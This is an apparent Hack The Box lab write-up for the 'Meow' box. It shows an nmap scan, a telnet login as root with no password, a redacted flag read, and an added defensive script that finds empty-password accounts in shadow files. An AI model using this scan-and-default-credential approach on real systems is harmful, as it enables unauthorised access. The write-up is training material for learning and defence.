March 30, 2026 htb

Meow

telnet misconfiguration default-credentials linux starting-point enumeration unauthenticated-access

Meow is the first Starting Point box on HTB, with a single telnet port exposed and no authentication on the root account. There’s no exploit chain here, just a misconfigured service waiting for someone to try the obvious credentials.


Enumeration

aero@aerobytes:~$ nmap -sT -sV {IP}
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-03-30 21:02 EDT
Nmap scan report for {IP}
Host is up (0.057s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

One open port — telnet on 23/tcp. That’s the only way in.


Foothold

Telnet was open, so we connected and got a login prompt.

aero@aerobytes:~$ telnet {IP}
Trying {IP}...
Connected to {IP}.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login: admin
Password:

admin with a blank password failed. First guess, wrong account.

Tried root next.

Meow login: root

No password prompt. root had no password set and we were in.

Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
...
root@Meow:~#

Flags

root@Meow:~# ls -la
total 36
drwx------  5 root root 4096 Jun 18  2021 .
drwxr-xr-x 20 root root 4096 Jul  7  2021 ..
lrwxrwxrwx  1 root root    9 Jun  4  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3132 Oct  6  2020 .bashrc
drwx------  2 root root 4096 Apr 21  2021 .cache
-rw-r--r--  1 root root   33 Jun 17  2021 flag.txt
drwxr-xr-x  3 root root 4096 Apr 21  2021 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   75 Mar 26  2021 .selected_editor
drwxr-xr-x  3 root root 4096 Apr 21  2021 snap
root@Meow:~# cat flag.txt
{flag redacted}
  • root.txt: {flag redacted}

Takeaways

Meow is about recognizing an exposed, unauthenticated service and acting on it. The attack surface was a single port. The entry point was a missing password on the root account.

Trying admin first was the right instinct. It’s a common default. It didn’t work here, but root with no password is just as common on misconfigured systems. Both are worth trying before reaching for a wordlist.

Telnet sends credentials in cleartext. Even on a box that required a password, anything on the wire would be readable.
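
The condition behind this box, an account whose password field is empty, can be audited from the defender's side by reading the shadow file. The script below is an added example, not part of the original writeup; the function names and the sample passwd/shadow contents are constructed for illustration and are not taken from the target.

```shell
#!/bin/sh
# Added example: list accounts whose shadow password field is empty,
# i.e. accounts that log in without a password, as root did on Meow.
# On a real host (as root): empty_password_accounts /etc/shadow /etc/passwd

empty_password_accounts() {
    shadow_file=$1
    passwd_file=$2
    # Pass 1 (passwd): remember each account's UID.
    # Pass 2 (shadow): an empty field 2 means no password is required.
    # Fields starting with "!" or "*" are locked and are not reported.
    awk -F: '
        NR == FNR { uid[$1] = $3; next }
        $2 == "" {
            tag = (($1 in uid) && uid[$1] == 0) ? "uid0" : "user"
            print $1 ":" tag
        }
    ' "$passwd_file" "$shadow_file"
}

# Constructed sample data (hypothetical accounts and placeholder hash).
make_sample() {
    dir=$1
    cat > "$dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
admin:x:1000:1000::/home/admin:/bin/bash
guest:x:1001:1001::/home/guest:/bin/bash
EOF
    cat > "$dir/shadow" <<'EOF'
root::18785:0:99999:7:::
daemon:*:18785:0:99999:7:::
admin:$6$constructedsalt$constructedhash:18785:0:99999:7:::
guest::18785:0:99999:7:::
EOF
}

tmp=$(mktemp -d)
make_sample "$tmp"
empty_password_accounts "$tmp/shadow" "$tmp/passwd"
rm -rf "$tmp"
```

Any line tagged `uid0` is a root-equivalent account with no password; setting a password or locking the account (`passwd -l`) closes it.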